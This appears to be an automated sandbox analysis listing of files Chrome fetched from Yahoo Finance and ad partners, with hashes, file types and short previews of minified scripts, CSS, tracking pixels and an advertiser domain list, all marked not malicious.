                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:487F486C165C5E6FAD46A8BBCB6279147FA93D3D3A004327D0DFDEA5040F9B320FE5439A0E2E849DFBB8CBB4FC1ADFDF6647BCCA1DDECCAAD5C36093FCE7A2B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-image-1.4.0-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-image",[],t):"object"==typeof exports?exports["wafer-image"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-image"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(a){if(r[a])return r[a].exports;var o=r[a]={i:a,l:!1,exports:{}};return e[a].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,a){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:a})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (58453)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):476737
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.419117959306688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:m9ivjwh+GUW1T3gv69owLgI9pNThOyk9BsHgvx+iS:OawYGUkTwv69o0z9pNTf08gvrS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E91D3408114CBA65564923D36EE9F76D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0ACFF91A8487CDC60BF857D7DF79A3F8A45D3891
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6D39304995011C2F87FF95BEAAC636032F5FD9D640FDA1F8B7E74E000C21A5DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1CFA60AD526EC73D1A0F42D91903EC2A8F758814BC652013991813A6CBCD02A11976CCCFD818F15D2AE24BE984F5F5A14EA2E88F55915B132BD8248534529A47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/prebid/prebid-2.0.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/* prebid.js v8.51.0.Updated: 2024-09-19.Build: 2.0.27.Modules: consentManagement, consentManagementGpp, consentManagementUsp, criteoBidAdapter, enrichmentFpdModule, gdprEnforcement, gppControl_usnat, gppControl_usstates, gptPreAuction, ixBidAdapter, liveIntentIdSystem, medianetBidAdapter, openxBidAdapter, prebidServerBidAdapter, priceFloors, pubmaticBidAdapter, rtdModule, rubiconBidAdapter, taboolaBidAdapter, tripleliftBidAdapter, ttdBidAdapter, userId, yahooAnalyticsAdapter, yahooPrebidServer, yahooRtdProvider, yahoosspBidAdapter, yieldmoBidAdapter, identityLinkIdSystem, pairIdSystem */.if(window.pbjs&&window.pbjs.libLoaded)try{window.pbjs.getConfig("debug")&&console.warn("Attempted to load a copy of Prebid.js that clashes with the existing 'pbjs' instance. Load aborted.")}catch(e){}else (function(){.(()=>{var r,t={5649:(r,t,e)=>{function n(r,t,e,n,o){for(t=t.split?t.split("."):t,n=0;n<t.length;n++)r=r?r[t[n]]:o;return r===o?e:r}e.d(t,{A:()=>n})},5920:r=>{./*.* @license MIT.* Fun Hoo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1620)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.329855816477348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:c81aOTRVh9ThTT8LT7LbSZNW5EqxPlg58JeS6pOYnN8LiKkknE1DXRksI0fS5:rMOTnJ8zHVEqxPC58QS6pxBK7nElRksm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6D969B0F81242D36A88FA5922140249E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:404E22A5E111FA02CFB626D45B201E598B425FA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7619B789D24BE9FCDC5B3A1DB864CA3B8194FA054D5881EEEA7F0D0F8A171705
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9C5CF9A3BC9170A9548DC8E36D349D2F751A3238177C60907F54720BF5F94736634DB4A1C12839F5EE5D0D2654F36F4CA87294ADD62CEDEA8709C203A832F61C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/vzm/cs_1.6.6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var c=window,t=c.document,e="*null",s=[1,9,10];function n(t,e,s,n){if(!t||!e||"function"!=typeof c[t])return n();try{c[t](e,s,(function(c,t){n(c,t)}))}catch(c){n()}}c.COMSCORE={_version:"1.6.6",beacon:function(r){n("__uspapi","getDoNotSell",1,(function(p,f){n("__tcfapi","getTCData",2,(function(n,o){var i=JSON.parse(JSON.stringify(r||{})),_=n&&n.gdprApplies||!1,a=c.YAHOO&&c.YAHOO.comscore||{},d=c.rapidInstance&&c.rapidInstance.getRapidAttribute;if(i.c1=i.c1||"2",i.c2=i.c2||a.c2||"7241469",i.c5=i.c5||d&&d("spaceid"),i.c7=i.c7||t.location.href,i.c8=i.c8||t.title||"",i.c9=i.c9||t.referrer||"",i.c14=i.c14||a.c14||"-1",i.gdpr=_?1:0,i.gdpr_consent="",_){if(o&&n){var u=s.every((c=>!0===n.purpose.consents[c])),l=!0===n.vendor.consents[77];i.cs_ucfr=u&&l?1:u&&l?"":0,i.gdpr_consent=n.tcString||""}}else f&&p&&"boolean"==typeof p.doNotSell?i.cs_ucfr=p.doNotSell?0:1:i.cs_ucfr=0;var g=i.cs_fpid||a.cs_fpid;if(g)if(i.cs_ucfr){var m=i.cs_fpdm||a.cs_fpdm;m&&m!==e?(i.cs_fpdm=m,i.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1058)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1059
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1109409484305
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:DOd1kGZRWAWJq2qFeR0MANmvtssvujjSYWeYmL4Na2Gev:k1Vwj9Rc7s4jUeJ4NbGw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:37ADF3441948B71BD7589823F7BCD0C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D99AA0426A06385C92F81D69030FA61CE9B2B966
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1B4C8ECE36EC68266F8B7EC948AEB5A1766CC29D444B47C328B95F89A2482F0F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C91C9721CF49C72CFFDD7B745FC7328650F3111191A2115DA6CB03790ED6C1F9B5A2DAFDFB6B8A33B3CAE5C79CD7F6EACC7EF3FEFC9CE41A068FB0C41D796029
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const v="modulepreload",y=function(a,l){return new URL(a,l).href},d={},w=function(l,c,u){let f=Promise.resolve();if(c&&c.length>0){const r=document.getElementsByTagName("link"),e=document.querySelector("meta[property=csp-nonce]"),h=(e==null?void 0:e.nonce)||(e==null?void 0:e.getAttribute("nonce"));f=Promise.all(c.map(t=>{if(t=y(t,u),t in d)return;d[t]=!0;const s=t.endsWith(".css"),m=s?'[rel="stylesheet"]':"";if(!!u)for(let o=r.length-1;o>=0;o--){const i=r[o];if(i.href===t&&(!s||i.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${t}"]${m}`))return;const n=document.createElement("link");if(n.rel=s?"stylesheet":v,s||(n.as="script",n.crossOrigin=""),n.href=t,h&&n.setAttribute("nonce",h),document.head.appendChild(n),s)return new Promise((o,i)=>{n.addEventListener("load",o),n.addEventListener("error",()=>i(new Error(`Unable to preload CSS for ${t}`)))})}))}return f.then(()=>l()).catch(r=>{const e=new Event("vite:preloadError",{cancelable:!0});if(e.payload=r,window.dispa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):177670
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.792996025783776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:T2HdALSWdG78KI4NBT0pfXle5jWlYoRl96678fG5qQzbmQ:qHdALSAG78KI4NBT0L4jWlYoL9N78fG9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6DE0CCF6F32F1B6445BDB3A0B00CB987
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5ED662833159C9E100647A841971DD52B739683B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3883A628FCAD29D8547482B40C0EDD023794F0087B758D1033C4F98DF09B86AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D0B258DE9AE6A0FBA0B0C88C53975376B7BF04C915E0E1E11FB5749458F0DAA8397E3592127F22D6262374E53237A32BE136324AB205727B0199C0D1B3D208A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(new function(){var c=['vvDq','AgfZqMvLBKfJDgL2zq==','Ahr0Cc1LCxvPDG==','DMfSDwu=','CMjVEa==','CgjQCW==','rNvUy3rPB24=','C2HPzNq=','yxeTEwHI','CMvWBgfJzunOAwXKCMvU','C2fMzuzYyw1L','zgLZCgXHEq==','qvvesu8=','y29Uy2f0','vezg','w0vsuL9nx0Lewf0=','qurg','v0felq==','q1jjtG==','B25fDMvUDa==','D2LUzg93lNbHCMvUDfSI','Bg9JywXtDg9YywDL','DhLWzq==','cIaGicbHDcbHyM91DdPZCMnKB2m6','ANn0EM9MzNnLDa==','qMXVy2TLza==','x2uSigv2ywWO','zg9JDw1LBNrfBgvTzw50','Aw1Nw2fSDf0=','y2LVx2jKmG==','q09j','r0fe','CgXHEq==','tKfm','lMrVy3vTzw50la==','sfrntfnJCMLWDevSzw1LBNq=','DgLTzxvWzgf0zq==','C3rHy2S6ia==','BgfUz3vHz2vZ','zMXVB3i=','Dg9Wtg9JyxrPB24=','yxvJDgLVBKvUza==','y29SlxbIyNm=','ywr1CMW9','zxH0lxDHza==','Aw1W','x19JB25ZB2XLlMeK','CMvSB2fK','C3rVCeLTBwvKAwf0zvbYB3bHz2f0Aw9U','qveTwuG=','zNjHBwvZ','Dw5ZAgLMDa==','w0vsuL9exq==','yMvMB3jLqMLKzgvYshr0Ca==','sw50zxjUywXfCNjVCG==','su5qvvq=','zgf0ys1LBMmTC2nYAxb0','Aw1WBgvTzw50yxrPB24=','yxbPu3PTrNjvBNDYCa==','C3jJlMnVBNrLBNq=','zgvZDgLUyxrPB24=','yMLKv29U','ywrT',
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://rtb.openx.net/sync/dds?ox_sc=1&ox_init=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (9707)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):9803
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4220018486921155
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:+R7wdDDSuELGG4Xu0oJOrXAIjhXRkyfgBr0V2pKMS:+R8dDGufXu0hASRkyfg90gS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:27CD26AB4C575D62BF184AB100FC8EA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C3F12AE1233E6AF1853B07CD2CF67F058361432C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2BB28B4B118B771B61D5F8056EE3139587FCEDBB64204E9005BE686351F2DA76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BB94E5BD1AA3A1F4C918D52BE1AB141E2E09631563E436149FA54BBD847307C0159F690F6ED9CC0F4021499705F7F0D7DAAD5656CD934F983D9A5E4D1603FF3C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see finQuote-3b430431.6c6819de00e6258bcc5a.js.LICENSE.txt */.(()=>{"use strict";var e,t,a,r,o,n={4039:(e,t,a)=>{var r=a(4603),o=void 0!==r.mE?r.mE:_exports.CIQ;o.ExtendedHours=o.ExtendedHours||function(e){var t=e.stx;this.filter=e.filter,t||(t=e,this.filter=!1);var a={};this.stx=t,this.stx.extendedHours=this,this.cssRequired=!0,t.addEventListener("theme",(function(e){for(var r in a={},t.layout.marketSessions)a.session||(a.session={}),a.session[r]=t.canvasStyle("stx_market_session "+r)})),t.addEventListener("symbolChange",(function(e){"master"!=e.action||!t.layout.extended||t.chart.market.market_def&&t.chart.market.sessions.length||o.alert("There are no Extended Hours for this instrument.")})),o.UI&&o.UI.KeystrokeHub.addHotKeyHandler("extendedHours",(({stx:e})=>{e.container.ownerDocument.body.keystrokeHub.context.advertised.Layout.setExtendedHours()}),t),this.prepare=function(e,r){for(var o in t.layout.extended=e,t.layout.marketSessions)a.session={},t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5874)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.195523929388335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:euuraq1L74qwCOmygquNQR/e9iygquPvr/7Uq8ujn5pq8iVInHyszeyejGH1OBH4:5garLmygxQ/eQygzr/gVc5pVEmyszey5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:58DFFE7D77A44AC7CCE3DDEA50CBF9DC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CDC9C294017C72F7F138ED82E5A2A557F90B8675
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F32047679C9382BA48E45DA832496F9F6CDAE54063126B324E84D7AEEF0F4CC2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:011F4AF2418D4F44EACA0F2D9F28A075A4351D49782B04D9AFB581C022ECD8F05DA38BA408EBCBBCB241AF66202212BE1B7D0585C221EEBC1006A37E5A2A4CF2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/registration/tags/v1.46.0/144-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkregistration=self.webpackChunkregistration||[]).push([[144],{9628:(e,o,r)=>{r.d(o,{EP:()=>n,EX:()=>s,Ih:()=>t,as:()=>i});var n="spot-im-user-logout",t="spot-im-login-start",i="spot-im-signup-start",s="spot-im-post-signup"},340:(e,o,r)=>{r.d(o,{g:()=>t});var n=r(7520);function t(){return(0,n.useModuleOptions)()||{}}},5144:(e,o,r)=>{r.r(o);var n=r(8776),t=r.n(n),i=r(5546),s=r(340),u=r(7520),l=r(3880),c=r(7200),a=r(9628),m=t().lazy((function(){return Promise.all([r.e(736),r.e(244),r.e(884),r.e(888),r.e(964)]).then(r.bind(r,2964))}));function p(){return t().useEffect((function(){c.c.apm.start("critical_flow")}),[]),t().createElement(m,null)}function d(e){var o=e.mode,r=e.eventType,n=(0,u.useSpotConfigPath)("init_data.config.sso_enabled"),i=(0,s.g)(),c=i.resolveLegacyInitAppPromise,m=i.resolve,d=(0,u.useDisconnectApp)();return t().useEffect((function(){var e;n&&(null===(e=null!=m?m:c)||void 0===e||e(),d())}),[n,c,m,d]),t().useEffect((function(){var e={signin:a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3439)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.976267587509436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:CRZlBIbY+oUsZoiFHmZTZVETVBKMwtZu6rbi9ZlZKHbpTfBn/Wl/uZ/YXlMZi5Zv:XszoTrOrY1TUvhZH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C89CF82411C6A871D38627B35928C3FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CFA425DA6A126F9D969D00730E22DC6425B23DE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:00DADAC942223A6C653E7FA99914FBA1CCDD67EB710066F2ED17BAFEB4BE2273
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F90A39AC640E26C116499BD2FB7068945B52382AD0F38DD7B8256B4323632777216723702D6A52325DB16BF78C8761DF81BCF1635199B2F70F677DEAEF403222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/PerformanceOverview.CHRqq3K8.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:section.yf-12wncuy.yf-12wncuy{overflow:hidden;height:-moz-min-content;height:min-content}.date.yf-12wncuy.yf-12wncuy{color:var(--text2);margin-top:calc(-1 * var(--space-1))}.perf.yf-12wncuy.yf-12wncuy{display:flex;align-items:center;font-weight:var(--font-bold);gap:var(--space-1);line-height:125%}.positive.yf-12wncuy.yf-12wncuy{color:var(--positive)}.positive.yf-12wncuy.yf-12wncuy:before{content:"+"}.negative.yf-12wncuy.yf-12wncuy{color:var(--negative)}.negative.yf-12wncuy.yf-12wncuy:before{content:"-"}.contentContainer.yf-12wncuy.yf-12wncuy{display:grid;grid-template-columns:1fr 1fr;white-space:nowrap;font-size:var(--font-l);gap:var(--page-row-gap)}.contentContainer.yf-12wncuy .card.yf-12wncuy:not(:last-child){position:relative}.contentContainer.mt.yf-12wncuy.yf-12wncuy{margin-top:var(--space-4)}.contentContainer.yf-12wncuy .card.yf-12wncuy:not(:last-child):after{content:"";position:absolute;top:50%;left:0;right:0;height:80%;transform:translateY(-50%)}.contentContainer.yf-12wncuy .car
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pixel.tapad.com/idsync/ex/receive?partner_id=1830&partner_device_id=07c89b85-4c1c-424d-8df0-0123ed6cebb6&ttd_puid=27d97432-f92a-465d-8317-0711a36cc1a6%2C%2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1016)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1017
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0715765358058125
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:oR1sjwHFEUwoL6yhc3XGvRqKQTZebCv531ABakHFsn+UHxvLk6L:csma66dMQK6ZebMFwJs++Tkq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F03C9FBB907E22FAF0E7BD4BE205BE49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:49DE683474BCA65C6939DE1FC3156CE161A02D31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A71BE7522F3340EF4861F7E219F28C3C27E93691931833DA985FF68A6E8A2A19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B229E8F24B52C2910DEDFA330E3320DE8FC5737006D7A4159DF1A414F8F3E8714754C4DFB1612FCE14E085B92551D001D5E3975B085090788E7D8402BDDE69C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:function m(e,t){if(!t)return"";const n=1e3,o=60*n,s=o*60,c=s*24,l=c*31,u=l*12,a=Date.parse(t)-Date.now();let i="year",r=Math.ceil(a/u);const f=Math.abs(a);return f<o?(i="second",r=Math.ceil(a/n)):f<s?(i="minute",r=Math.ceil(a/o)):f<c?(i="hour",r=Math.ceil(a/s)):f<l?(i="day",r=Math.ceil(a/c)):f<u&&(i="month",r=Math.ceil(a/l)),e.format(r,i)}function D(e="en-US",t={}){const n=new Intl.RelativeTimeFormat(e,{numeric:"auto",style:"long",...t});return function(s){return m(n,s)}}function T(e,t="en-US",n={}){return D(t,n)(e)}function h(e){const t=new Date,n=new Date(e);return!(t.getDate()===n.getDate()&&t.getMonth()===n.getMonth()&&t.getFullYear()===n.getFullYear())}function M(){const e=new Date,t=g(e)?-4:-5;e.setHours(0,0,0,0);const n=e.getTime()+e.getTimezoneOffset()*6e4;return new Date(n+t*36e5).getTime()}function g(e){const t=new Date(e.getFullYear(),0,1).getTimezoneOffset(),n=new Date(e.getFullYear(),6,1).getTimezoneOffset();return Math.max(t,n)!==e.getTimezoneOffset()}export{M as a,T as f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.162628750394423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:DEMYCIbB4pEx9PgdbToC7MQ+iIo2EBOCoSMgaQME/eYNPLy3zRhH2Qv/H+hf2COW:gMbIbB4pEx9Pg17MQ+iIo2EBOCoSMgaG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2FF8039AAC72DA3FC83FBA1B284BAA45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:040E20D71BDCA7AB88AA543178770C55020ED33B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BF4698D774243337F18C174D8551304E8618ECCE825AADB7E9671BDD56EC5A50
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D11081C236AB2C31CFE286BA293E0586EECE7B3ED6872EBAE74C56DC0E40FE7DE24F9D000C04EE19F516F0E273AFE8645325400ECABA68429513732EF8ADFC9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{. "brandProtection": {. "badv": {. "1111.com.tw": true,. "1keygou.com": true,. "3oaksorchard.com": true,. "43cbd.com": true,. "4everstamp.com": true,. "aax.com": true,. "abloodsugaroption.com": true,. "abra.com": true,. "accessmediaportal.com": true,. "acebarry.com": true,. "acticatin.com": true,. "actiongamesplace.com": true,. "actualitateavranceana.ro": true,. "adameve.com": true,. "adblocker.vpnwelt.com": true,. "aditore.com": true,. "adlock.com": true,. "adpushup.com": true,. "adremover.com": true,. "adremover.org": true,. "adrenal.ru": true,. "adriangadea.ro": true,. "adrianvigheciu.ro": true,. "adroll.com": true,. "ads.google.com": true,. "ads.sharebeast.com": true,. "adsterra.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (4228)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4229
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.259805917055012
